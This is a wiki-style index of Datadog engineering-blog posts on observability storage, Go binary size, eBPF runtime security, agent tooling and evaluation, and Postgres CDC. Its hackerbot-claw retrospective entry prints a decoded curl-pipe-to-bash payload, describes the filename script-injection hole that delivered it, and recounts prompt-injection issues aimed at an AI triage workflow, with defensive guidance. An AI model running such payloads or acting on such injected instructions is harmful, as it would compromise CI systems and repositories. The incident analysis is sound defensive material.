Datadog¶
Datadog Engineering — Datadog is an observability / APM / monitoring vendor; its engineering blog documents the internals of its ingest, storage, query, and analytics stack at "trillions of events per day" scale.
Tier: Datadog is not in AGENTS.md's formal Tier 1/2/3 lists; treat as Tier-3-equivalent for scope — apply the Tier-3 selectivity filter (skip pure-ML research / product-PR). Distributed-systems-internals posts (e.g., Husky) are on-topic and ingested in full; foundation-model-research announcements (e.g., Toto) are skipped.
Key systems / series covered¶
- systems/husky — distributed observability event store over object storage (S3 / GCS / Azure Blob) + FoundationDB metadata. Custom Parquet-like columnar fragment format; hybrid size-tiered + locality (leveled) LSM compaction; trimmed-FSA-regex per-fragment pruning filters. 3-part series: intro, ingestion deep-dive, compaction (ingested 2025-01-29).
- Go runtime debugging — production-scale Go fleet operation; a 2025 post traces a Go 1.24 memory regression across hundreds of pods through `/proc/[pid]/smaps` and upstream collaboration with the Go team. Extended 2026-02-18 into Go binary-size engineering: the 6-month / 77 % Agent-binary reduction program (sources/2026-02-18-datadog-how-we-reduced-agent-go-binaries-up-to-77-percent) covering dependency auditing via systems/goda + systems/go-size-analyzer, re-enabling the Go linker's method dead-code elimination, and tracing a 245 MiB amd64-only regression to containerd's stdlib `plugin` import. Four upstream PRs (containerd, kubernetes/kubernetes, uber-go/dig, google/go-cmp) make this a canonical patterns/upstream-the-fix datum — Kubernetes inherited the method-DCE win for free and reports 16-37 % of its own.
- systems/datadog-workload-protection — Datadog's Linux runtime-security product. On-host Agent + eBPF programs across file / process / network hooks, with process + container context. Built on systems/ebpf-manager (OSS Go lifecycle library) + systems/co-re + fallbacks for kernels back to 4.14. Dogfooded on Datadog's own edge.
- systems/datadog-workload-protection-fim — the FIM subsystem; Agent-side rules + in-kernel filtering (approvers + discarders in eBPF maps) reduce a ~10B file-events/min stream to ~1M events/min forwarded, ~94% of events resolved in the kernel (ingested 2025-11-18; expanded 2026-01-07 with broader Workload Protection context).
- systems/datadog-mcp-server — Datadog's official Model Context Protocol server; observability interface designed for customer AI agents. V1 thin-API-wrapper failed on agent-specific modes (context-window overflow, token-blowout on variable records, trend-inference-from-samples); redesigned around concepts/agent-context-window as the scarce resource. Five-pattern response: CSV/YAML over JSON + default-trim (~5× records/budget), patterns/token-budget-pagination, patterns/query-language-as-agent-tool (SQL; ~40% cheaper eval runs), patterns/tool-surface-minimization (flexible tools + toolsets + layering), patterns/actionable-error-messages.
- systems/bits-ai-sre — Datadog's hosted SRE agent (web-UI alert investigator); the "specialized agent" counter-example to the general-purpose MCP server, framing the design trade-off Datadog now pitches as a blurring boundary.
- systems/bits-ai-sre-eval-platform — Bits' offline, replayable evaluation platform. Tens of thousands of scenarios per weekly full run. Built on a ground-truth + world-snapshot label split, deliberately noisy simulated environments, product-feedback-derived labels, and agent-assisted label validation. Now generalised across Datadog APM, Database Monitoring, and other agentic products.
- systems/postgresql — Datadog runs Postgres as a metadata store for host lifecycle tracking (`hosts`, `host_last_ingested`); the 2026-03-23 post is a WAL-level debugging case on this substrate. Datadog's 2025-11-04 CDC-platform post re-frames Postgres as the CDC source of a managed multi-tenant replication platform: `wal_level=logical` + publications + slots + heartbeat tables feed Debezium source connectors on Kafka Connect, which publish to Kafka for downstream Elasticsearch / Postgres / Iceberg / Cassandra / cross-region-Kafka sinks.
- Managed multi-tenant CDC replication platform (patterns/managed-replication-platform) — platform seeded by a single Postgres-to-Elasticsearch pipeline (Metrics Summary page, p90 ~7 s → ~1 s, replication lag ~500 ms) and generalised into five sink classes. Five composed patterns: Debezium + Kafka Connect transport backbone, Temporal-orchestrated provisioning over the 7-step manual runbook, offline migration-SQL validator blocking pipeline-breaking DDL like `SET NOT NULL`, Kafka Schema Registry in backward-compat mode (multi-tenant, Avro-serialised, protects external custom consumers too), and SMT + centralised enrichment API as the two-axis per-tenant customisation surface. Explicit architectural choice of async replication for scalability over strict consistency (ingested 2026-04-22).
- systems/bewaire — Datadog's LLM-driven malicious-PR detection pipeline; two-stage LLM classifier over ~10,000 weekly PRs, verdicts routed through Cloud SIEM → SIRT case → incident. First publicly disclosed production catch: the 2026-02-27 hackerbot-claw campaign, the wiki's canonical instance of autonomous attack agents. Five-pattern defensive playbook for LLM-powered GitHub Actions (patterns/untrusted-input-via-file-not-prompt + patterns/llm-output-as-untrusted-input + patterns/minimally-scoped-llm-tools + use-recent-models + keep-secrets-out-of-LLM-step) in the 2026-03-09 hackerbot-claw retrospective. Defence-in-depth containment via patterns/org-wide-github-rulesets: when hackerbot-claw achieved CI code execution on `datadog-iac-scanner` through script injection, org rulesets reduced the blast radius to a harmless commit on a throwaway branch. Datadog also maintains systems/dd-octo-sts-action, a fork of Chainguard's systems/octo-sts, as the OIDC-federated PAT replacement for GitHub workflow credentials.
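The FIM subsystem's approver/discarder split can be sketched in user-space Python. This is only a model of the decision logic — the real implementation keeps both sets in eBPF maps and resolves ~94% of events in the kernel; the class and method names here are illustrative, not Datadog's:

```python
# Illustrative model of the two-stage FIM filter: approvers are
# compiled from rules ahead of time (positive filter); discarders are
# learned at runtime for paths that provably cannot match (negative
# filter). Stage 1 stands in for the cheap in-kernel eBPF check.
import fnmatch

class TwoStageFilter:
    def __init__(self, rules):
        self.rules = rules                       # glob patterns, e.g. "/etc/*"
        # Concrete (non-glob) paths become compile-time approvers.
        self.approvers = {r for r in rules if not any(c in r for c in "*?[")}
        self.discarders = set()                  # runtime-learned negatives

    def kernel_stage(self, path):
        """Cheap O(1) check standing in for the in-kernel eBPF filter."""
        if path in self.approvers:
            return "forward"
        if path in self.discarders:
            return "drop"
        return "evaluate"                        # escalate to user space

    def user_stage(self, path):
        """Full rule engine; teaches the kernel stage about misses."""
        if any(fnmatch.fnmatch(path, r) for r in self.rules):
            return True
        self.discarders.add(path)                # future events drop early
        return False

    def handle(self, path):
        verdict = self.kernel_stage(path)
        if verdict == "evaluate":
            return self.user_stage(path)
        return verdict == "forward"

f = TwoStageFilter(["/etc/passwd", "/etc/*"])
assert f.handle("/etc/passwd") is True           # approver hit
assert f.handle("/tmp/scratch") is False         # miss; learns a discarder
assert f.kernel_stage("/tmp/scratch") == "drop"  # now filtered at stage 1
```

The same path only pays the expensive user-space evaluation once; repeats are dropped by the cheap stage, which is the volume-reduction move the posts describe.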
Key concepts / patterns introduced into the wiki from Datadog¶
- concepts/lsm-compaction — size-tiered + leveled hybrid.
- concepts/columnar-storage-format — with adaptive row-group sizing + inline column headers for streaming.
- concepts/fragment-pruning — per-file skip-index design axis.
- patterns/streaming-k-way-merge — 1-GET-per-input bounded-memory CPU-saturated compaction merge.
- patterns/trimmed-automaton-predicate-filter — FSA → regex in metadata, Bloom-analog with no false negatives.
- concepts/go-runtime-memory-model — Go runtime virtual-vs-RSS divergence; `/proc/[pid]/smaps` as the ground truth the `runtime/metrics` package cannot see.
- concepts/binary-size-bloat — 5-year Agent `.deb` growth 428 → 1,248 MiB (+192 %) as the canonical bloat datum; the 6-month reduction program as the canonical cure recipe.
- concepts/dead-code-elimination — Go linker's method-DCE surface: what disables it (reflect / plugin-mode), what re-enables it (source patches).
- concepts/go-build-tags — file-level compile guard; the mechanism behind Datadog's per-binary / per-platform build matrix and the upstream containerd fix.
- concepts/transitive-dependency-reachability — graph-theoretic reason a single function can drag a 570-package k8s cluster into an unrelated binary.
- concepts/reflect-methodbyname-linker-pessimism — 16-25 % per-binary cost of a non-constant `reflect.MethodByName` call site; Datadog patched ~a dozen dependencies + forked stdlib `text/template` + `html/template`.
- concepts/go-plugin-dynamic-linking-implication — 245 MiB cost of importing stdlib `plugin` transitively via `containerd`, on `amd64` only.
- patterns/upstream-the-fix — Datadog's four PRs (containerd / kubernetes / uber-go/dig / google/go-cmp) canonicalised the Go-toolchain variant of Cloudflare's 2025-10 shape; Kubernetes inherited 16-37 % of its own.
- patterns/build-tag-dependency-isolation — upstream containerd `plugin`-import build tag; the Agent applies it.
- patterns/single-function-forced-package-split — trace-agent one-function-pulls-k8s case: 570 packages / 36 MiB removed by moving one function.
- patterns/bisect-driven-regression-hunt — production-signal → env bisect → feature-flag A/B → drop-one-observability-layer → minimal reproducer → upstream `git bisect` → maintainer fix.
- systems/ebpf — kernel programmable runtime; the substrate under Workload Protection's FIM.
- concepts/in-kernel-filtering — push per-event match logic into eBPF programs so the ring buffer carries only plausible matches.
- concepts/edge-filtering — Agent-side rule evaluation as the pipeline-volume-reduction move (producer-side filter; composes with streaming aggregation).
- patterns/approver-discarder-filter — compile-time positive filters + runtime-learned negative filters in eBPF maps.
- patterns/two-stage-evaluation — cheap O(1) kernel filter protecting a rich user-space rule engine.
- concepts/ebpf-verifier — both safety guarantee and the primary source of operational variability across kernel versions / distros; motivates CI matrices + lifecycle abstractions + minimum-viable hook-set gating.
- systems/co-re — Compile Once – Run Everywhere; BTF-backed offset patching; with fallback offset-guessing + hardcoded offsets covers kernels back to 4.14.
- systems/ebpf-manager — Datadog's OSS Go library consolidating eBPF program lifecycle across Workload Protection, Cloud Network Monitoring, Universal Service Monitoring.
- patterns/shared-kernel-resource-coordination — multi-vendor eBPF coexistence (TC priorities + handles, cgroup ordering); the named case study is the 2022 Datadog × systems/cilium TC-handle-collision incident.
- concepts/agent-context-window — the fixed-size LLM working set as the dominant scarce resource in MCP-server design; Datadog reframes format, pagination, query surface, tool count, and error design as applications of this one discipline.
- patterns/token-budget-pagination — cut at N tokens, return cursor; robust against record-size variance (Datadog log records span 100 B to 1 MB).
- patterns/query-language-as-agent-tool — expose SQL, not raw retrieval; ~40% cheaper eval runs in some Datadog scenarios.
- patterns/tool-surface-minimization — flexible tools + opt-in toolsets + layering (tool chaining) as three complementary ways to stay within agent tool-calling accuracy + context budget.
- patterns/actionable-error-messages — specific corrective errors ("did you mean 'status'?") as the agent-recovery primitive; paired with a discoverable-docs tool + advisory-guidance-in-success-responses.
- concepts/wal-write-ahead-logging — Postgres WAL as both the durability primitive and the hard throughput ceiling (~1,000 8-KiB fsyncs/sec on gp3 EBS per `pg_test_fsync`); every committed transaction costs one fsync, and row locks that assign a transaction ID force a COMMIT record whether or not data actually changed.
- concepts/postgres-mvcc-hot-updates — Postgres MVCC writes a new tuple per `UPDATE`; HOT updates skip index writes when no indexed column changes and the same page has free space (`fillfactor` < 100); HOT addresses update cost, not lock cost — hence the Datadog case study where a HOT-optimized table still suffered 2× IOPS because `ON CONFLICT DO UPDATE` locks before `WHERE`.
- patterns/cte-emulated-upsert — Postgres-specific query pattern: `WITH insert_attempt AS (INSERT ... ON CONFLICT DO NOTHING RETURNING ...) UPDATE ... WHERE ... AND NOT EXISTS (SELECT FROM insert_attempt)`. Avoids the implicit conflict-row lock of `ON CONFLICT DO UPDATE`; the common fresh-row path emits zero WAL records. Trade-off: a small concurrent-delete race, accepted only when the workload tolerates imprecision.
- concepts/evaluation-label — two-part eval unit: ground truth + world snapshot (telemetry queries, not raw bytes). The agent never sees the ground truth; the world snapshot survives raw-telemetry TTL.
- concepts/trajectory-evaluation — score how the agent investigated (depth, telemetry surfaced, distance to correct answer), not only final-answer correctness. Unlocked at Datadog by a ~30% uplift in label RCA quality.
- concepts/pass-at-k — over k attempts, does the agent succeed on at least one? Separates capability from sampling stability; standard label attribute in the Bits eval platform.
- concepts/noise-injection-in-evaluation — simulated eval environments must include unrelated components on the same platform/team/monitor/naming cluster. Without it, evals are an open-book exam with only the relevant pages; scores over-state production quality.
- concepts/telemetry-ttl-one-way-door — raw telemetry expires; decisions to defer snapshotting are decisions to permanently lose it. Datadog accepted a short-term hit (−11% pass rate, −35% label count) when regenerating too-narrow labels with broader scope, in exchange for long-term eval fidelity.
- patterns/product-feedback-to-eval-labels — every user thumbs-up/-down + free-text feedback becomes a candidate eval label; label volume scales with adoption (+order-of-magnitude over manual internal labelling).
- patterns/agent-assisted-label-validation — once alignment studies with human judges clear a quality bar, use the agent itself to aggregate signals + derive RCAs + propose labels; humans shift from assembling to refining. Validation time per label ↓ >95% in one week at Datadog.
- patterns/noisy-simulated-evaluation-environment — the operational shape for noise injection: expand the world snapshot along platform/team/monitor/naming adjacency edges, reconstruct signals for the noisy set, isolate per-label at the data layer.
- concepts/change-data-capture — Datadog's 2025-11-04 CDC platform is the wiki's canonical instance of CDC as a first-class multi-tenant platform (vs. the earlier table-format-compaction and real-time-cache-invalidation framings).
- concepts/asynchronous-replication — deliberately chosen as the foundation of Datadog's CDC platform ("favouring scalability over strict consistency"); ~500 ms replication lag as the operating point.
- concepts/schema-evolution — the "hard problem" of async CDC. Datadog's two-layer answer (offline migration-SQL validator + runtime backward-compat Schema Registry) is the canonical wiki reference.
- concepts/logical-replication — Postgres logical replication with `wal_level=logical` as a CDC source; 7-step source-side operator runbook documented via Datadog's 2025-11-04 post.
- systems/debezium — Kafka Connect-based CDC source-connector family; core ingestion component of Datadog's CDC platform. Datadog maintains custom forks for Datadog-specific logic.
- systems/kafka-connect — "backbone for scalable, fault-tolerant data movement between systems" in Datadog's CDC platform; single-message transforms as the per-tenant customisation surface.
- systems/kafka-schema-registry — multi-tenant, backward-compat mode, integrated with source + sink connectors; protects external custom consumers too.
- systems/temporal — durable-workflow engine used to automate the 7-step CDC-pipeline provisioning runbook.
- patterns/managed-replication-platform — Datadog's platform shape; five-pattern bundle above.
- patterns/debezium-kafka-connect-cdc-pipeline — OSS CDC transport backbone.
- patterns/workflow-orchestrated-pipeline-provisioning — Temporal-decomposed provisioning runbook.
- patterns/schema-validation-before-deploy — offline migration-SQL validator (blocks `SET NOT NULL` on potentially-null columns); half of Datadog's two-layer schema-evolution safety answer.
- patterns/schema-registry-backward-compat — the runtime half.
- patterns/connector-transformations-plus-enrichment-api — two-axis per-tenant customisation: Kafka Connect SMTs at transport + centralised enrichment API at storage.
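The streaming k-way merge listed above has a compact shape: keep one in-flight element per sorted input (analogous to one GET per fragment) and a k-entry heap, so memory stays bounded regardless of input size. A minimal sketch with Python's `heapq`; the function name is illustrative:

```python
# Bounded-memory k-way merge over sorted inputs: each input is
# consumed as an iterator, and only k head elements are resident at
# once. This is the shape of a streaming compaction merge, not
# Husky's actual implementation.
import heapq

def k_way_merge(sorted_inputs):
    heap = []
    iters = [iter(s) for s in sorted_inputs]
    # Seed the heap with each input's head element.
    for idx, it in enumerate(iters):
        first = next(it, None)
        if first is not None:
            heapq.heappush(heap, (first, idx))
    # Repeatedly emit the global minimum and refill from its input.
    while heap:
        value, idx = heapq.heappop(heap)
        yield value
        nxt = next(iters[idx], None)
        if nxt is not None:
            heapq.heappush(heap, (nxt, idx))

fragments = [[1, 4, 9], [2, 3, 10], [5, 6]]
assert list(k_way_merge(fragments)) == [1, 2, 3, 4, 5, 6, 9, 10]
```

(The stdlib's `heapq.merge` does the same thing; spelling it out makes the one-element-per-input memory bound visible.)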
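The no-false-negative property of the pruning filter above can be illustrated with a much simpler stand-in than Husky's trimmed-FSA construction: per-fragment trigram sets over a column's values. If a query literal contains a trigram the fragment never saw, the fragment cannot contain a match and can be skipped; collisions only ever cause extra reads, never missed rows. All names below are illustrative:

```python
# Bloom-analog pruning filter with no false negatives, using
# character trigrams as a deliberately simplified stand-in for the
# FSA-derived regex metadata described above.
def trigrams(s):
    return {s[i:i + 3] for i in range(len(s) - 2)}

def build_filter(values):
    """Per-fragment skip-index: the set of trigrams seen in the column."""
    seen = set()
    for v in values:
        seen |= trigrams(v)
    return seen

def might_match(fragment_filter, literal):
    """False => the fragment provably cannot contain the literal."""
    return trigrams(literal) <= fragment_filter

frag_a = build_filter(["payment-service", "payments-db"])
frag_b = build_filter(["checkout-api"])
assert might_match(frag_a, "payment")      # must read fragment A
assert not might_match(frag_b, "payment")  # safe to skip fragment B
```

True pruning power comes from doing this per fragment before issuing object-storage reads, so skipped fragments cost nothing.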
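Token-budget pagination, as listed above, cuts pages at a token budget rather than a record count and returns a cursor. A minimal sketch, with whitespace tokenisation standing in for a real model tokenizer (the helper names are illustrative, not Datadog's API):

```python
# Cut the response at a token budget, not a record count, and return
# a cursor so the caller can resume. Robust against record-size
# variance: a record-count page is unbounded in tokens if one record
# is huge.
def count_tokens(record: str) -> int:
    return len(record.split())      # stand-in for a model tokenizer

def paginate(records, cursor=0, budget=8):
    page, used = [], 0
    for i in range(cursor, len(records)):
        cost = count_tokens(records[i])
        if page and used + cost > budget:
            return page, i          # cursor: index of the next record
        page.append(records[i])     # an oversized record still ships alone
        used += cost
    return page, None               # None: no more pages

logs = ["err timeout", "ok",
        "huge trace with many many tokens inside it", "ok again"]
page1, cur = paginate(logs)
assert page1 == ["err timeout", "ok"] and cur == 2
```

Note the `if page and ...` guard: a single record larger than the budget is still returned on its own page rather than looping forever.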
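pass@k, as used in the eval-platform entries above, reduces to a simple aggregation over repeated attempts. A sketch with illustrative names:

```python
# pass@k: over k sampled attempts at the same scenario, did the agent
# succeed at least once? Reported across labels, it separates "can
# the agent do this at all" (capability) from "does it do it
# reliably" (sampling stability).
def pass_at_k(attempt_results):
    """attempt_results: list of bools, one per attempt (k = len)."""
    return any(attempt_results)

def pass_rate(attempts_by_label, k):
    """Fraction of labels solved within the first k attempts each."""
    solved = sum(pass_at_k(a[:k]) for a in attempts_by_label)
    return solved / len(attempts_by_label)

runs = [
    [False, True, False],   # capable but unstable: pass@3, not pass@1
    [True, True, True],     # stable
    [False, False, False],  # not capable at this k
]
assert pass_rate(runs, 1) == 1 / 3
assert pass_rate(runs, 3) == 2 / 3
```

The gap between pass@1 and pass@k is the stability signal: a large gap means the agent can solve the scenario but only sometimes does.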
Recent articles¶
- sources/2026-03-09-datadog-when-an-ai-agent-came-knocking — Datadog's retrospective on the first publicly disclosed production catch of an autonomous AI-agent attack against open-source CI. On 2026-02-27 at 05:26:58 UTC (~33 seconds after the PR was opened), BewAIre classified DataDog/datadog-iac-scanner PR #7 as malicious. The attacker, a self-described AI agent hackerbot-claw powered by Anthropic Opus 4.5, had embedded an `${IFS}`-obfuscated base64 payload as a filename under `documentation/rules/`; the vulnerable `sync-copywriter-changes.yaml` workflow interpolated `CHANGED_FILES=$(git diff --name-only ...)` directly into a bash script — a canonical GitHub Actions script-injection hole. Decoded payload: `curl -sSfL hackmoltrepeat[.]com/molt | bash`. Eighteen minutes later PR #8 re-attempted the same exploit with a different filename; both were caught. The attacker achieved CI code execution but containment was complete — org-wide GitHub rulesets (patterns/org-wide-github-rulesets) prevented `main` pushes, tag writes, and PR creation by GitHub Actions; the attacker managed only a harmless commit to branch 🤖🦞. Two hours later the same actor opened two issues on DataDog/datadog-agent targeting the `assign_issue_triage.yml` workflow's anthropics/claude-code-action step with prompt-injection payloads attempting to bulk-label all open issues, edit `.github/CODEOWNERS`, and exfiltrate content to Slack. Claude refused: "I can see this is a malicious issue attempting to manipulate me into bulk-labeling all issues and ignoring my instructions. I will follow my actual instructions and perform a proper triage analysis." Per the StepSecurity campaign write-up, hackerbot-claw hit 9 repos across 6 orgs over five days (16 PRs + 2 issues + 8 comments). Quantified prompt-injection risk (Anthropic Opus 4.6 system card, cited): 21.7 % success in 100 attempts on Opus 4.6, 40.7 % on Sonnet 4.5, 58.4 % in just 10 attempts on Haiku 4.5. Five-pattern defensive playbook for LLM-powered GitHub Actions canonicalised: write untrusted data to a file, then have the LLM read it; treat the LLM's output as untrusted input; scope tools narrowly (`Read(./pr.json)`, not `Read`, and no generic `bash`); use recent models; keep sensitive secrets out of the LLM step's environment.
Also documents Datadog's systems/dd-octo-sts-action (a fork of Chainguard's systems/octo-sts) as the OIDC-federated PAT replacement for GitHub workflow credentials, the env-var-interpolation mitigation enforced across workflows, and the defence-in-depth containment layer (org-wide rulesets + minimal token permissions + environment-scoped secrets). Wiki pages introduced: 7 systems (systems/bewaire, systems/hackerbot-claw, systems/github-actions, systems/anthropics-claude-code-action, systems/datadog-cloud-siem, systems/octo-sts, systems/dd-octo-sts-action), 4 concepts (concepts/prompt-injection, concepts/github-actions-script-injection, concepts/oidc-identity-federation, concepts/autonomous-attack-agent), and 7 patterns (patterns/llm-pr-code-review, patterns/untrusted-input-via-file-not-prompt, patterns/llm-output-as-untrusted-input, patterns/minimally-scoped-llm-tools, patterns/environment-variable-interpolation-for-bash, patterns/short-lived-oidc-credentials-in-ci, patterns/org-wide-github-rulesets).
- sources/2025-11-04-datadog-replication-redefined-multi-tenant-cdc-platform — How Datadog built its managed, low-latency, multi-tenant data-replication platform. The narrative opens on a Metrics Summary page slow-query incident: a join of 82K active metrics × 817K metric configurations per org-level query on a shared Postgres hit p90 ~7 s, every facet adjustment triggering another expensive query, with rising error rate + reduced throughput under concurrent load (APM-confirmed). The re-architecture recognised that real-time search + faceted filtering is fundamentally different from OLTP; it rerouted to a dedicated search platform populated by dynamic denormalisation during replication from Postgres — page load ~30 s → ~1 s (up to 97%) with replication lag ~500 ms. That single pipeline became the seed of a managed multi-tenant replication platform on four architectural pillars: (1) automated pipeline provisioning with Temporal workflows replaces the manual 7-step runbook (enable `wal_level=logical`, create Postgres users, create publications + slots, deploy Debezium, create Kafka topics, set up heartbeat tables, configure sink connectors) with modular reliable tasks stitched into higher-level orchestrations — "operational load grew exponentially" was the explicit driver (patterns/workflow-orchestrated-pipeline-provisioning); (2) asynchronous replication as the foundation, chosen over synchronous "favouring scalability over strict consistency" — decouples application performance from network latency + replica responsiveness, accepts minor data lag during failures; (3) schema-evolution safety via two layers — automated migration-SQL validation offline (blocks e.g. `ALTER TABLE ... ALTER COLUMN ... SET NOT NULL`, which would break in-flight null-carrying messages) + multi-tenant Kafka Schema Registry in backward-compat mode at runtime (Avro-serialised, data + schema pushed together, external custom consumers share the contract); (4) per-tenant pipeline customisation via two surfaces (patterns/connector-transformations-plus-enrichment-api): Kafka Connect single-message transforms (dynamic topic rename, column type conversion, composite PK by field concatenation, add/drop columns) + custom connector forks where OSS falls short, plus a standardised enrichment API atop the search platform for shared derivation logic. One Postgres-to-search pipeline generalised to five sink classes: Postgres-to-Postgres (unwinding the shared monolithic DB + Orgstore backups), Postgres-to-Iceberg (event-driven analytics), Cassandra replication (source generalisation beyond SQL), cross-region Kafka replication (data locality + resilience for Datadog On-Call). Headline operating numbers: search-query latency ↓ up to 87% (summary list) / page load ↓ up to 97% (body).
Introduces systems/debezium, systems/kafka-connect, systems/kafka-schema-registry into the wiki; extends systems/kafka, systems/postgresql, systems/elasticsearch, systems/apache-iceberg, systems/temporal, concepts/change-data-capture, concepts/wal-write-ahead-logging, concepts/backward-compatibility; creates concepts/asynchronous-replication, concepts/schema-evolution, concepts/logical-replication, patterns/managed-replication-platform, patterns/debezium-kafka-connect-cdc-pipeline, patterns/workflow-orchestrated-pipeline-provisioning, patterns/schema-validation-before-deploy, patterns/schema-registry-backward-compat, patterns/connector-transformations-plus-enrichment-api.
- sources/2026-04-07-datadog-bits-ai-sre-eval-platform — How Datadog built the offline, replayable evaluation platform for Bits AI SRE. Not the agent itself — the infrastructure that makes agent behaviour observable, measurable, and repeatable across changes, built because features improved one investigation class while quietly regressing unrelated scenarios (e.g. an early auto-extraction of the monitor's service name degraded unrelated investigations by pulling in irrelevant signals). Two prior attempts failed: per-tool isolated testing (which wrongly assumed compositional correctness — real failures emerge from how Bits chains tools and reasons across outputs) and re-running live investigations (no aggregation, environment drift, telemetry expiry, no replay). Architecture: (1) a curated label set — each label has two parts, ground truth (the real root cause; the agent never sees it) and world snapshot (queries that reconstruct the signals the agent would have seen, not raw telemetry — survives concepts/telemetry-ttl-one-way-door); (2) an orchestration platform that runs Bits against labels at scale, scores results, tracks history. Simulated environments are deliberately noisy — expanded to include unrelated components on the same platform/team/monitor/naming cluster (patterns/noisy-simulated-evaluation-environment, forced by the production reality that SREs sift red herrings). The label pipeline evolved manual → product-feedback-driven (every user interaction → candidate label, +order-of-magnitude label-creation rate) → Bits-assisted validation (alignment studies with human judges gate trust; validation time ↓ >95% in one week; label quality ↑ ~30% measured as 5-Whys-RCA pass rate). Higher-quality labels unlocked concepts/trajectory-evaluation (score how the agent investigated, not just the final answer) and concepts/pass-at-k (capability vs. sampling-stability separation).
Explicit retrospective on the one-way-door cost of early narrow labels: regenerating with broader scope cost −11% pass rate, −35% label count short-term, long-term evaluations became predictive of production behaviour. Full eval set runs weekly across tens of thousands of scenarios; results piped to Datadog dashboards + Datadog LLM Observability + Slack alerts. New models evaluated upfront (Claude Opus 4.5 fully scored within days, per-domain improvement/regression breakdown before rollout). Platform now generalises beyond Bits — APM, Database Monitoring, and internal incidents all become eval labels.
- sources/2026-03-23-datadog-debugging-postgres-upsert-wal — Production Postgres debugging at the WAL level. A `last_ingested` upsert table deliberately designed for HOT updates (narrow dedicated table, unindexed tracked column, `fillfactor=80`) nonetheless doubled write IOPS and quadrupled WAL syncs at ~500 upserts/sec, heading for the single-writer fsync ceiling at the targeted 25,000/sec. Using the Postgres-15 `pg_walinspect` extension + an `lldb` breakpoint on `WALInsertLockAcquire`, Datadog proves that `INSERT ... ON CONFLICT DO UPDATE` locks the conflicting row before the `WHERE` clause is evaluated, the lock assigns a transaction ID, the xid forces a `Transaction COMMIT` record, and the COMMIT forces a WAL fsync — every no-op upsert costs one fsync. Fix: a patterns/cte-emulated-upsert that composes `ON CONFLICT DO NOTHING` inside a CTE with a separate conditional `UPDATE` gated on `NOT EXISTS (SELECT FROM insert_attempt)`. On the common fresh-row path this emits zero WAL records. Trade-off: a small concurrent-delete race window, accepted because host-liveness tracking is inherently imprecise. Introduces concepts/wal-write-ahead-logging and concepts/postgres-mvcc-hot-updates into the wiki; extends systems/postgresql.
- sources/2026-03-04-datadog-mcp-server-agent-tools — Design retrospective on Datadog's official MCP server — the first observability interface built for customer AI agents rather than humans/programmatic clients. V1 thin-API-wrapper failed on three agent-specific modes (context-window overflow from raw data; token blowout on variable-size records; brute-force sample-and-infer for aggregation questions). Redesigned around concepts/agent-context-window as the dominant scarce resource, yielding five patterns: (1) token-efficient formats — CSV for tabular (~½ tokens/record vs JSON), YAML for nested (~−20%), + default-field trimming (~5× more records/budget); (2) patterns/token-budget-pagination (Datadog log records span 100 B to 1 MB — record-count pagination is effectively unbounded in tokens); (3) patterns/query-language-as-agent-tool — SQL surface so agents `SELECT`/`LIMIT`/`COUNT`/`GROUP BY` instead of sampling; ~40% cheaper eval runs in some scenarios, "at our scale traditional relational databases don't work"; (4) patterns/tool-surface-minimization — flexible tools + opt-in toolsets + layering (tool chaining, with +1 call latency cost); (5) patterns/actionable-error-messages — specific corrective errors ("did you mean 'status'?") + a `search_datadog_docs` RAG tool reachable from server instructions + advisory prose inside successful responses ("you searched for `payment`, did you mean `payments`?"). Positioning vs systems/bits-ai-sre (hosted SRE agent with purpose-built web UI) as the general-MCP-server ↔ specialized-agent trade-off, with a stated roadmap to expose Bits AI SRE capabilities through MCP.
- sources/2026-02-18-datadog-how-we-reduced-agent-go-binaries-up-to-77-percent
— 6-month retrospective on cutting Datadog Agent Go-binary sizes by up to 77 % (Dec 2024 → Jul 2025) across versions 7.60.0 → 7.68.0 without removing any feature. Linux amd64 `.deb`: 265 MiB → 149 MiB compressed (−44 %), 1.22 GiB → 688 MiB uncompressed (−44 %). Per-binary: Core 236 → 103 (−56 %), Process 128 → 34 (−74 %), Trace 90 → 23 (−74 %), Security 152 → 35 (−77 %), System Probe 180 → 54 (−70 %) MiB. Three-part recipe: (1) systematic dependency auditing with goda (why each dep was imported) + go-size-analyzer (how much in bytes) + `go list` (what is in the binary) — canonical find: trace-agent pulled 526 k8s packages / ≥30 MiB via one function in one package; the fix was a package split (#32174) removing 570 packages and 36 MiB — "more than half of the binary", "an extreme example, but not a unique one". (2) Re-enabling method dead-code elimination — the Go linker drops methods no code calls, but any non-constant `reflect.MethodByName` (canonical offenders: stdlib `text/template` + `html/template`) forces retention of every exported method of every reachable type (concepts/reflect-methodbyname-linker-pessimism). Datadog patched ~a dozen dependencies (kubernetes/kubernetes#132177, uber-go/dig#425, google/go-cmp#373) and forked stdlib `text/template` + `html/template` into `pkg/template/` with the method-call code path statically disabled. Result: 16-25 % per binary / ~100 MiB total on Linux amd64. Iterative diagnosis via whydeadcode — which consumes the linker's `-dumpdep` output and names the first culprit call-chain — fix, re-run, repeat. (3) Unblocking an amd64-only regression that — after a hack-first bound (comment out every DCE-disabler to see the ceiling) — turned out to be containerd's `plugin/plugin_go18.go` importing the stdlib `plugin` package: just importing `plugin` puts the linker into dynamically-linked mode, which disables method-DCE AND keeps every unexported method (concepts/go-plugin-dynamic-linking-implication). Datadog upstreamed containerd#11203 to gate the import behind a build tag (patterns/build-tag-dependency-isolation) and applied the tag via #32538 - #32885. Result: a 245 MiB (~20 % of total) reduction on main Linux amd64 artifacts, benefiting ~75 % of users. Ecosystem-level compound benefit — Kubernetes contributors subsequently enabled method-DCE on their own binaries and report 16-37 % size reductions. Canonical wiki datum for concepts/binary-size-bloat (5-year 428 → 1,248 MiB pre-cure growth) + concepts/dead-code-elimination + patterns/upstream-the-fix (third instance, Go-toolchain variant of Cloudflare's 2025-10 shape) + patterns/measurement-driven-micro-optimization (binary-size variant: profile → explain → bound → fix loop). Introduces systems/datadog-agent, systems/go-compiler, systems/go-linker, systems/goda, systems/go-size-analyzer, systems/whydeadcode, systems/containerd, systems/text-template, systems/html-template into the wiki; extends systems/kubernetes (both victim and beneficiary); creates concepts concepts/binary-size-bloat, concepts/dead-code-elimination, concepts/go-build-tags, concepts/transitive-dependency-reachability, concepts/reflect-methodbyname-linker-pessimism, concepts/go-plugin-dynamic-linking-implication; creates patterns patterns/build-tag-dependency-isolation, patterns/single-function-forced-package-split; extends patterns/upstream-the-fix and patterns/measurement-driven-micro-optimization.
- sources/2026-01-07-datadog-hardening-ebpf-for-runtime-security
